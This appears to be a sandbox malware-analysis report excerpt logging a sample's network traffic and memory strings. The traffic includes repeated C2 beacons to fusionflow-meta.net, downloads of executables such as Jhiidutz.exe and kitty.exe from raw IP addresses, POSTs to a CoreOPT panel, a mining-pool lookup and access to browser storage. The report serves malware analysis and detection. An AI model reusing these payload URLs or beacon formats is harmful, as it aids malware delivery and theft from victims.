Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /inc/kitty.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /freedom.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/ovrflw.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freedom.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freedom.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: #www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: 2x.si
Source: global traffic	DNS traffic detected: DNS query: tmpfiles.org
Source: global traffic	DNS traffic detected: DNS query: fusionflow-meta.net
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: exonic-hacks.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: rx.unmineable.com

Source: unknown

HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 20:42:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateCF-Cache-Status: BYPASSSet-Cookie: XSRF-TOKEN=eyJpdiI6Ik5rOTRXbXJKQ3UxZm9tTk5GRnpGZmc9PSIsInZhbHVlIjoiUFI3Z0pORkEweFJqOXllNStmVlJOWWhBOUtHYkdBb3lXSFRncjNwdnB2NlZ3K3JTbVQ0TnJ4Z1RRK1lTcTBsUWlsQ3pnUUFFUnk1eE5ZM0t3ZnpHTE9FRDFzOVI0SUxYVzZoL1RHbE5peEQxSG1SQ0xvemZlUktzOEdqd2ViRmciLCJtYWMiOiI1ZjQzY2FhMWVjOWYyNGE3ZThlYjY4YjgxZmY0NjY5MTczY2U1MjQ0NDRhZWJjZjBmNzQ3N2JjZGJlNTkzZWJmIn0%3D; expires=Sat, 31-Aug-2024 22:42:06 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: tmpfiles_session=eyJpdiI6IjgwM1pHV1MvT2N3Z2lLVFZZVWQ1NFE9PSIsInZhbHVlIjoiUE95bElQcGM0QmdYcUlGT3hGSGp0dThiL1AxWVc4SC82aFFnSnRieG0rTWpwN2VoZDA1bi9IMmJWT2pVZ2tiZ0kvcG9KWFk1Z2trUnR6NFdtd0ZpSE12RGZYZjdqQUNuMVNES09IMTUyOTZOcVZGNU56RklXbXRLZWFQN2tLZjgiLCJtYWMiOiI5ZWIyNzVmZTJjNjg3ODU1YzZjYTA3NjZiMDA2YjY3OWM1ZWQ1MDk1MTJlN2RlZTRkZTU0NDdhOTg2ZTU0OTg3In0%3D; expires=Sat, 31-Aug-2024 22:42:06 GMT; Max-Age=7200; path=/; httponly; samesite=laxReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XWV6tssYwI1p%2B4TKF4GPcLJqBrHsqf2haCw9Ye99YKRZvBnrf9lE2UOR2Yzn0RZgcIloou%2F%2F5%2FjTyhGWQKHBkQOuXXA7t5hY1w1hrVMBJBKQOG9%2Ftj2L3c56Krkz%2FPE%3D"}],"group":"cf-nel","max_age":604800}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 20:42:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateCF-Cache-Status: BYPASSSet-Cookie: XSRF-TOKEN=eyJpdiI6ImtZeFg4b0N5SmlCUUl2aHV6T1lvOXc9PSIsInZhbHVlIjoiQXVObjVrTlVKRVR6NUFyaElrQUFtSUhtZ0NiZVl4MERYcjAvb0FaaGVHdURmSVRnOWUrTnBNbWtFNTduUEZPV0x1bmp0b2d4L1dQRzcxUC91TmFUV1ovaXEybmswMHU4U2RteG4rQ2tDQU9EbE1VOFQ2L2c4RVVPeXhhV01KcDYiLCJtYWMiOiJiYWVlMjhmYjFmZmFiOWFkNjA0OTlhMmMxM2U1OGI2MTBiZDRhOTRiZjc3N2NiODNlY2EyMTdlMWRjNjY5NjE5In0%3D; expires=Sat, 31-Aug-2024 22:42:09 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: tmpfiles_session=eyJpdiI6InBseGxERDJ0cHdMeWp3VkVSNFFFR0E9PSIsInZhbHVlIjoia1lUaDBmVit1bEVwTEJLQmdsd0FQQlExSlBpTlpSMlV1RzdkeW9tYmFzaWlxd3YwZW9qRmJLeEtmWTV4Z0xXU1I1ZktPemJxbHRJS1hWR3ptM1BmVFc2djNpaS9SbFZpOGxTNzRQVlVnRmVtSDN0K3NTeUdIWHBDcjk0TUIrQnciLCJtYWMiOiIyYjJiNWYzODZiZjZiOTFiMzgyYjlkZGI1MjIwMTg0OGIzYjNjNDkzODU1M2Y1YjYwOWZjNzJkMDdkN2VkZmM3In0%3D; expires=Sat, 31-Aug-2024 22:42:09 GMT; Max-Age=7200; path=/; httponly; samesite=laxReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=08Gt17IvjeHRFClg0j3sj5z5Y1pxGnO%2FDUwhoboG2cYC4bsH7KVbWGeAs8uLIANh%2Bvh3dDoLuEgUYZtDyujIGie892rO6PoDFuOaIjDo4v2iYuS5IWNrOJXSs7QpxFY%3D"}],"group":"cf-nel","max_age":604800}

Source: RegAsm.exe, 00000002.00000002.2080894884.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/kitty.exe
Source: RegAsm.exe, 00000002.00000002.2088920952.00000000040B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/ovrflw.exe
Source: RegAsm.exe, 00000002.00000002.2088920952.00000000040B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/ovrflw.exe_$h
Source: RegAsm.exe, 0000002D.00000002.2148146374.0000000000D34000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2148146374.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php
Source: RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php)
Source: RegAsm.exe, 00000002.00000002.2080894884.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php-
Source: RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php369.jpg
Source: RegAsm.exe, 00000002.00000002.2088920952.00000000040B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php7$
Source: RegAsm.exe, 00000002.00000002.2088920952.00000000040B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php9/CoreOPT/index.php
Source: RegAsm.exe, 0000002D.00000002.2148146374.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2148146374.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=1
Source: RegAsm.exe, 0000002D.00000002.2148146374.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=1#
Source: RegAsm.exe, 0000002D.00000002.2148146374.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=1&;
Source: RegAsm.exe, 00000002.00000002.2080894884.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=17
Source: RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=1d
Source: RegAsm.exe, 0000002D.00000002.2148146374.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=1f
Source: RegAsm.exe, 0000002D.00000002.2148146374.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.phpH
Source: RegAsm.exe, 00000002.00000002.2088920952.00000000040B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.phpR$_
Source: RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.phpZ
Source: RegAsm.exe, 0000002D.00000002.2148146374.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.phpbH
Source: RegAsm.exe, 0000002D.00000002.2148146374.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.phpt
Source: RegAsm.exe, 00000002.00000002.2088920952.00000000040B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php~$
Source: Cerker.exe, 00000008.00000002.2080368416.000000000172A000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1906992557.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2026314308.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1972256140.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000002.2079172061.000000000135A000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2025971986.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050751367.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050800394.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1989324205.0000000001729000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000003.1962092193.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000003.1989365694.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000003.1945589635.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exe
Source: Cerker.exe, 00000008.00000003.1906992557.0000000001704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exe-Q7
Source: Cerker.exe, 00000008.00000002.2080368416.000000000172A000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2026314308.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2025971986.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050751367.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050800394.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exeCO
Source: Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exeD
Source: Cerker.exe, 00000008.00000003.1906992557.0000000001704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exeGN
Source: Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exeN
Source: Cerker.exe, 00000008.00000002.2080368416.000000000172A000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1906992557.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2026314308.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1972256140.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2025971986.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050751367.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050800394.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1989324205.0000000001729000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exeSN
Source: Cerker.exe, 00000008.00000003.2026314308.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2025971986.0000000001704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exekO
